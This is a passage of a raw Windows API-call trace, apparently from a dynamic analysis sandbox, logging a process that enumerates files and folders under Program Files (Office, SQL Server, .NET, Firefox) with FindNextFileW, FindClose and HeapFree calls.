hHeap=0x6a0000) returned 1 [0170.279] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2a7e39eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ae4bf10, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17beb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbghelp.dll", cAlternateFileName="")) returned 1 [0170.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee45f66d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0170.568] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0170.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa50bd2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b050, dwReserved0=0x0, dwReserved1=0x0, cFileName="SQLDumper.exe", cAlternateFileName="SQLDUM~1.EXE")) returned 1 [0170.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ae4bf10, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ae4bf10, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0170.568] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0170.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.574] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb142e44, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb142e44, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0170.574] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.575] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e11c27d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e11c27d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e11c27d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Office", cAlternateFileName="MICROS~3")) returned 1 [0170.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.575] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft SQL Server", cAlternateFileName="MICROS~2")) returned 1 [0170.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.576] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Shared", cAlternateFileName="")) returned 0 [0170.576] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0170.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.576] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="110", cAlternateFileName="")) returned 0 [0170.576] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.576] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0170.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.577] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0170.577] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0170.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.577] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADOMD.NET", cAlternateFileName="")) returned 0 [0170.577] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.577] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 0 [0170.577] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.577] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesX86", cAlternateFileName="PROGRA~2")) returned 1 [0170.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.580] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa937f07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2b015b1d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2b0d4700, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128848, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbghelp.dll", cAlternateFileName="")) returned 1 [0170.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.581] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf3143659, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0170.581] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0170.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.581] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5e91324, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5e91324, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5eb74f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17a50, dwReserved0=0x0, dwReserved1=0x0, cFileName="SQLDumper.exe", cAlternateFileName="SQLDUM~1.EXE")) returned 1 [0170.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.581] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2b0d4700, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2b0d4700, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0170.581] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0170.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.583] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0170.583] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.584] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2f517e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2f517e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2f517e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0170.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.587] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="APDEA0~1.DLL")) returned 1 [0170.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.589] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2c4a611d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2c4a611d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2c4a611d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21276, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessCompare.rdlc", cAlternateFileName="ACCESS~1.RDL")) returned 1 [0170.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.788] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2c4a611d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2c4a611d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2c4a611d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMessageDismissal.txt", cAlternateFileName="EXCELM~1.TXT")) returned 1 [0170.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.797] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c3c0a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c3c0a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4c3c0a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x171878, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0170.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.802] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2f517e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office16", cAlternateFileName="")) returned 0 [0170.802] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.802] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft SQL Server", cAlternateFileName="MICROS~3")) returned 1 [0170.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.943] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Shared", cAlternateFileName="")) returned 0 [0170.943] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0170.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.943] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="110", cAlternateFileName="")) returned 0 [0170.943] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0170.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.944] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0170.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.944] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0170.944] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0170.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.944] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADOMD.NET", cAlternateFileName="")) returned 0 [0170.944] FindClose (in: hFindFile=0x727748 | out: hFindFile=0x727748) returned 1 [0170.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.944] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0170.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.945] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugins", cAlternateFileName="")) returned 0 [0170.945] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0170.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.945] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 0 [0170.945] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.945] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee8d7d1d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee8d7d1d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0170.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.949] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b6194c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b6194c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SystemX86", cAlternateFileName="SYSTEM~1")) returned 1 [0170.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.952] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, 